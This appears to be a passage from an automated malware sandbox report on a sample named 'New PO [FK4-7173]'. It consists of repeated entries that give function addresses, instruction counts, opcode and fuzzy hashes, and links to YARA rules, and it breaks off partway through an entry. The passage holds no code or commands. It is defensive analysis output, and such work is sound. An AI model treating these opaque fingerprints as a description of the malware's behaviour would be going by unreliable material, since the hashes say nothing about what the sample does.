                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2b03b6ea8bc4b56a06fbb4fdb6321ea07cb222728181cb5ddb6201d27c4dedc1
                                                                          • Instruction ID: 7642d1a5b6f95fc92eb619409ce3d41ed5308fdfbe9c815e832cc711e8dde6c4
                                                                          • Opcode Fuzzy Hash: 2b03b6ea8bc4b56a06fbb4fdb6321ea07cb222728181cb5ddb6201d27c4dedc1
                                                                          • Instruction Fuzzy Hash: 40210833705681EBE72E57AC9C44B293BD4AF41B78F290364FE709B6E2DB78C8418241
                                                                          Function 0116A30B Relevance: .1, Instructions: 70COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7fb70cf07924e720310de735b78cad9fa56a0fcdb31234a613969c487b9843ac
                                                                          • Instruction ID: 60d3eaf828e4da7a60dfa6b40866447e67e54fa42eb21a3306168591357385eb
                                                                          • Opcode Fuzzy Hash: 7fb70cf07924e720310de735b78cad9fa56a0fcdb31234a613969c487b9843ac
                                                                          • Instruction Fuzzy Hash: 4721A979210A11AFC729DF29C800B56B7F5BF18B48F248468E559DBB61E371E842CF98
                                                                          Function 011EA49A Relevance: .1, Instructions: 70COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 447cdadfc7965749873976e066273bdc868a5907ae19146b74183427e0030e92
                                                                          • Instruction ID: 55cc95d4bfd3747a233f0831059e0200f75cf1f2ed4af7db08ec2de1f8fe104f
                                                                          • Opcode Fuzzy Hash: 447cdadfc7965749873976e066273bdc868a5907ae19146b74183427e0030e92
                                                                          • Instruction Fuzzy Hash: DB112C72340F11BFE32A5595AC05F67B6D9DFD4B60F150428B718DB284DBB0DC018795
                                                                          Function 011B0946 Relevance: .1, Instructions: 70COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c6d8e83078e1bc38296972b620a3a70b760c15bdbd1014f8af70e5629229f679
                                                                          • Instruction ID: bbe42cc6d0c65834aca831475c0f87ec76f9b68716b11c449ddb112452239e0a
                                                                          • Opcode Fuzzy Hash: c6d8e83078e1bc38296972b620a3a70b760c15bdbd1014f8af70e5629229f679
                                                                          • Instruction Fuzzy Hash: 4E21E6B1E00219ABDB24DFAAE9849EEFBF9FF98610F10012EE509A7254D7749941CB50
                                                                          Function 011C80A8 Relevance: .1, Instructions: 69COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                          • Instruction ID: c816d7bba0b05590d6c2a0ccb7c5497e4e86affdb86fbde20debf1c992645cb1
                                                                          • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                          • Instruction Fuzzy Hash: DE218C72A00219EFDF169F98CC80BAEBBFAEFA8710F214419F910A7251D774D9518B50
                                                                          Function 01160124 Relevance: .1, Instructions: 68COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                          • Instruction ID: ed5e990006a807435d22a74c68712bfda1dd4de508c4afcd1bb1ab1f6f3a3582
                                                                          • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                          • Instruction Fuzzy Hash: CF11EF73601609EFE72A9F88CC40FAABBBCEB94758F104029F6009B180D776ED54CB60
                                                                          Function 01138770 Relevance: .1, Instructions: 68COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8d3bff0beccd72a47d4b54fb9ca888d0c092e252a884dfd67110a455c7dae7c5
                                                                          • Instruction ID: 3415ddc309b7d82107348a7ebdc970c048bee2fd796b6359a47b33cd053687ca
                                                                          • Opcode Fuzzy Hash: 8d3bff0beccd72a47d4b54fb9ca888d0c092e252a884dfd67110a455c7dae7c5
                                                                          • Instruction Fuzzy Hash: A211B671700A11DBDB1ACF5DC480956BBE6AFC6750B15416DFE08DF208D7B1E9018790
                                                                          Function 011380E9 Relevance: .1, Instructions: 66COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b4c3f28e34b38834fc66d89662ba1d53b0b448f20062d8dffb470197200c3fb5
                                                                          • Instruction ID: 6b936d57a2e67169cc57b4c4255261c5077eeea7e3db538421e5c44f2aedfb28
                                                                          • Opcode Fuzzy Hash: b4c3f28e34b38834fc66d89662ba1d53b0b448f20062d8dffb470197200c3fb5
                                                                          • Instruction Fuzzy Hash: D5218E75A00206DFCB18CF98C581AAEBBF5FB88718F24426DE505AB315CB71AD06CBD0
                                                                          Function 0116674D Relevance: .1, Instructions: 65COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b127d36c85f72f776c57eda2e5826d941e1f98b48e9eb307ae3618b235abb499
                                                                          • Instruction ID: 7dca66afc8703cf8ba9a495135cb6c10d0a6f9c36cc1acfbb34d3308344d7b7a
                                                                          • Opcode Fuzzy Hash: b127d36c85f72f776c57eda2e5826d941e1f98b48e9eb307ae3618b235abb499
                                                                          • Instruction Fuzzy Hash: A6218E75510A01EFD7389F68C840B66B7F8FF44650F44882DE59AC7650DB75AC50CBA1
                                                                          Function 011C6870 Relevance: .1, Instructions: 63COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0dd837b9ee9e143a4b67c776ed77e67246ec8cc56393585cb54531772e84575a
                                                                          • Instruction ID: 9bf38180ad0f8fcb0806b2eef040c076dc45e91161bb89d60307c5654d47fdb1
                                                                          • Opcode Fuzzy Hash: 0dd837b9ee9e143a4b67c776ed77e67246ec8cc56393585cb54531772e84575a
                                                                          • Instruction Fuzzy Hash: 85119132240615EFC72ADB59CD40FDA77A8EFA9E64F114029F6159B351EB70E901C7A0
                                                                          Function 0115E8C0 Relevance: .1, Instructions: 63COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: adb26c97263ec173f1561b0ab98300795bfcf127283b30fe812b8921e963d535
                                                                          • Instruction ID: 3af9328255c438f0fb8085e58bf4568a72ebb6a37c23d77cc7a977648f41473b
                                                                          • Opcode Fuzzy Hash: adb26c97263ec173f1561b0ab98300795bfcf127283b30fe812b8921e963d535
                                                                          • Instruction Fuzzy Hash: E0114833710121ABCF1DDB29CC80A6FB666EBD1374B258539ED32CB280EB309802C290
                                                                          Function 011666B0 Relevance: .1, Instructions: 61COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5d3f59f67acbffd63ef10edf2fbaad742f16b59e1f130fb22dd66288b1f45d55
                                                                          • Instruction ID: d33dcd1547b1058d5999b9202542d75c03cc3db95caf03c8b406a1fcab73b0c4
                                                                          • Opcode Fuzzy Hash: 5d3f59f67acbffd63ef10edf2fbaad742f16b59e1f130fb22dd66288b1f45d55
                                                                          • Instruction Fuzzy Hash: BD11E376A01645EFCB2DCF59E580A5ABBFDEF94610F068079E9059B310E738DD10CB90
                                                                          Function 011FA8E4 Relevance: .1, Instructions: 61COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                          • Instruction ID: 4c6ea02fc9d979c167eaa38f0a27c3258c582ab2cda3ed9a0a9c02b423716f0a
                                                                          • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                          • Instruction Fuzzy Hash: E1110136A00919AFDB1DCB58CC05B9EBBF5FF84214F058269E996A7340E735AE01CB80
                                                                          Function 011BE7E1 Relevance: .1, Instructions: 59COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                          • Instruction ID: 7c47e708f3961c706382a9e0278b207849bd29c77eaa6e3a35754fef89b93b55
                                                                          • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                          • Instruction Fuzzy Hash: 8611C232602E05EFE7399F49C880BD6BBE6EF45758F058428FA099B164DB71DC40DB90
                                                                          Function 011527ED Relevance: .1, Instructions: 58COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b2463864aabd87eb85aa9fa3960f449ea12f6ec9164401eadbad778ba7fb99ed
                                                                          • Instruction ID: fd9b213fe81525872f553bf1c68a31b6dab8bb755c6e43dc56e7905c692f8d7c
                                                                          • Opcode Fuzzy Hash: b2463864aabd87eb85aa9fa3960f449ea12f6ec9164401eadbad778ba7fb99ed
                                                                          • Instruction Fuzzy Hash: 9101DB32605645EBE71E936DD844F6B6BDCEF81754F190065FD108B651DB24DC00C2A1
                                                                          Function 01134690 Relevance: .1, Instructions: 57COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ef3390d794c0e320f67bf840209152d6ab7256d3ba0fd59b84d128981b326f14
                                                                          • Instruction ID: 8693a6e5007a64a18b436448ff7638a0541fd4681f5ee41f01b2ceb5b8648e1b
                                                                          • Opcode Fuzzy Hash: ef3390d794c0e320f67bf840209152d6ab7256d3ba0fd59b84d128981b326f14
                                                                          • Instruction Fuzzy Hash: 2A11CE7A200A45AFDB3ECF5AD844F567BA9EBC6B64F014119F9048BA98C374E800CF60
                                                                          Function 01204B00 Relevance: .1, Instructions: 57COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1ab7157db5453855810b9bbc7fc0add982136f36691e2285a7c34a4775f6e73d
                                                                          • Instruction ID: b5e5d6952c7d7ab3277cbfa2a24e3c73bd0620212e392dddae7d17d731153791
                                                                          • Opcode Fuzzy Hash: 1ab7157db5453855810b9bbc7fc0add982136f36691e2285a7c34a4775f6e73d
                                                                          • Instruction Fuzzy Hash: 7C112932610A529FD723EA29D844F27B7A5FFC4710F148619EB86C76D1EB30E802C790
                                                                          Function 01166620 Relevance: .1, Instructions: 56COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7fae7e227de9fda5ae611d7deaf41864431e0f7c6388c444858dc2dc183e4b8f
                                                                          • Instruction ID: 918e4c1ddec2a22cb50303c776ac374571747ddabb0a054a4dd10bf8ac143138
                                                                          • Opcode Fuzzy Hash: 7fae7e227de9fda5ae611d7deaf41864431e0f7c6388c444858dc2dc183e4b8f
                                                                          • Instruction Fuzzy Hash: F511E572A00716ABDB25EF59E980B9EFBBCFF84B50F500055DA01A7200D731AD11CB90
                                                                          Function 0115EA2E Relevance: .1, Instructions: 56COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 71efea33014d70140fb21164044bd4abe60a4d4e85bf2fd321d4ad8a5de61871
                                                                          • Instruction ID: 721a4236213290b8dbdf58063565500969eed0378f75945f0f11f0ddd6c81d6a
                                                                          • Opcode Fuzzy Hash: 71efea33014d70140fb21164044bd4abe60a4d4e85bf2fd321d4ad8a5de61871
                                                                          • Instruction Fuzzy Hash: FF01D271901109EFC329DF28E408F6ABBF9EF81318F20816AE4048B261D770AD42CB90
                                                                          Function 0115E53E Relevance: .1, Instructions: 55COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                          • Instruction ID: 4d3b30ce286b4a03cdd558c61be3000c95d0244e6508a64389a0a0c26f202aaa
                                                                          • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                          • Instruction Fuzzy Hash: 5511C6756166C2EBEB2E972C8544B257B94AB01B5CF1A00A0ED61C7642F328C942C251
                                                                          Function 011BE75D Relevance: .1, Instructions: 54COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                          • Instruction ID: 0ed372d8c612a2d41679bd68cf869e4a1b7ea81e2b7ace6e344259f1f7f23e2b
                                                                          • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                          • Instruction Fuzzy Hash: 6101F972602905AFE72D5F58CC80FD67BA9EF80754F058024EA059B260E775DD40CBD0
                                                                          Function 0112A250 Relevance: .1, Instructions: 52COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                          • Instruction ID: 71be8a19088f684dca3158df5afd3600f6593957d1d4a20d02c44084c40a76b2
                                                                          • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                          • Instruction Fuzzy Hash: 190149314047329BCB398F59E840A32BBF6FF56B60701892DFC958BA81D331D420CB60
                                                                          Function 01204940 Relevance: .1, Instructions: 52COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 74b800becc606bc159b92d5b0e4bee6f7ffca6ff1bd89f0506c8425a8017136f
                                                                          • Instruction ID: a2ac3b2d32b3030b6f876c9c0d8331a043a646e7fb0866c592af4797c46939af
                                                                          • Opcode Fuzzy Hash: 74b800becc606bc159b92d5b0e4bee6f7ffca6ff1bd89f0506c8425a8017136f
                                                                          • Instruction Fuzzy Hash: C2010432561556AFC333EF1C9800E12B7A8EB81774B268325EB689B1D7D730D801CBC0
                                                                          Function 011AE1D0 Relevance: .1, Instructions: 51COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 821cfdb7f7777809c0eab1480a54dbea18bc7919f0de8e1871054e316746842b
                                                                          • Instruction ID: 87df5ead051e11c44ff55a9dabda6457b1ccad46ad8ff98b36d9f57b85d84d76
                                                                          • Opcode Fuzzy Hash: 821cfdb7f7777809c0eab1480a54dbea18bc7919f0de8e1871054e316746842b
                                                                          • Instruction Fuzzy Hash: AE11A136242241EFDB19EF19CD80F167BB8FF54B58F1000A5ED059B661D335ED01CA90
                                                                          Function 01136259 Relevance: .1, Instructions: 51COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3cc030bca722b04af536d151ef34807c74cb14d7275fa288d9a6e7b7c572d582
                                                                          • Instruction ID: d8ca5bf1a33accc01375b8e4493f20dcfd9c0766c163b011de22840833785487
                                                                          • Opcode Fuzzy Hash: 3cc030bca722b04af536d151ef34807c74cb14d7275fa288d9a6e7b7c572d582
                                                                          • Instruction Fuzzy Hash: F7115E71541229ABEB39AB64CC41FED7374FB44714F5041D4A314A61E0DB709E91CF85
                                                                          Function 011B6050 Relevance: .0, Instructions: 50COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1b657f3cb14aa8e74b451c16f387aeaa46c8e7fa590575d87aedc84abafdcff6
                                                                          • Instruction ID: 8118c203469a48c3bacdc926394b444d2a89a780a653a29f32ce28acd216f3f9
                                                                          • Opcode Fuzzy Hash: 1b657f3cb14aa8e74b451c16f387aeaa46c8e7fa590575d87aedc84abafdcff6
                                                                          • Instruction Fuzzy Hash: 3C111772900119ABCB25DB95CC84DEFBB7CEF58258F044166E906E7211EB34AA15CBA1
                                                                          Function 0113208A Relevance: .0, Instructions: 50COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                          • Instruction ID: f8129a8681817acd9ea3289079ffcac2740282288d7d7248795d4b24c372af30
                                                                          • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                          • Instruction Fuzzy Hash: 180128322001118BEF1DBA1DD880F56B767BFC4700F5681A9ED158F24ADB71CC81C790
                                                                          Function 011C6500 Relevance: .0, Instructions: 50COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 38230ac6c351fe2aa1c094fcc2441b31efb457ea4d3342ad7e00eaac74356620
                                                                          • Instruction ID: c163e7a1054e8bec3aac0fc582ce7a08bfbc5e1d9f8fb7d4618e95b774d33886
                                                                          • Opcode Fuzzy Hash: 38230ac6c351fe2aa1c094fcc2441b31efb457ea4d3342ad7e00eaac74356620
                                                                          • Instruction Fuzzy Hash: 751104326401469FC319CF58D800BA6FBB9FB6A754F188159E848CB315D732EC80CBA0
                                                                          Function 011BC810 Relevance: .0, Instructions: 50COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7b743588e5a55cddcb2732d1c52cfd01924245cbf3190e513e14056ce87dab92
                                                                          • Instruction ID: 17a60e6e9cce8c413f2b4e3a14c0124224a08a2b7146967509920fc5170d3517
                                                                          • Opcode Fuzzy Hash: 7b743588e5a55cddcb2732d1c52cfd01924245cbf3190e513e14056ce87dab92
                                                                          • Instruction Fuzzy Hash: FE1118B1A00209ABCB04DFA9D581AAEBBF8FF58250F10406AE905E7351D774EA018BA4
                                                                          Function 011DEA60 Relevance: .0, Instructions: 50COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a78e154c4e78bb7b2e59e5259f301f90702d9cb77288569654090b0ac68defb7
                                                                          • Instruction ID: bf274b290b7e70897c88cae5008feabb12b5df5a4354a92b7a2bb607054dd257
                                                                          • Opcode Fuzzy Hash: a78e154c4e78bb7b2e59e5259f301f90702d9cb77288569654090b0ac68defb7
                                                                          • Instruction Fuzzy Hash: D2012435142222ABCB3EEF198840D7ABBB9FF51A56B05442EF1010F200CB34DC81CBD2
                                                                          Function 0112C020 Relevance: .0, Instructions: 49COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                          • Instruction ID: a9ec60acb6d62d583aab1caa749eb4286d3685965a3c7a31f2bcc6a2ac33daee
                                                                          • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                          • Instruction Fuzzy Hash: 9A012D321007459FDF2AA669E400F6B77F9FFD5654F05841EE65687580DF74E401CB60
                                                                          Function 011720F0 Relevance: .0, Instructions: 49COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2ebb99b94afeaebd494d740ff86d9a705d9ab6fd8351116e21a0a93cb444fe14
                                                                          • Instruction ID: 6f2c3153c28304e1bd799c28fc037f9a6af236a5af57994e61745b38ca6a899c
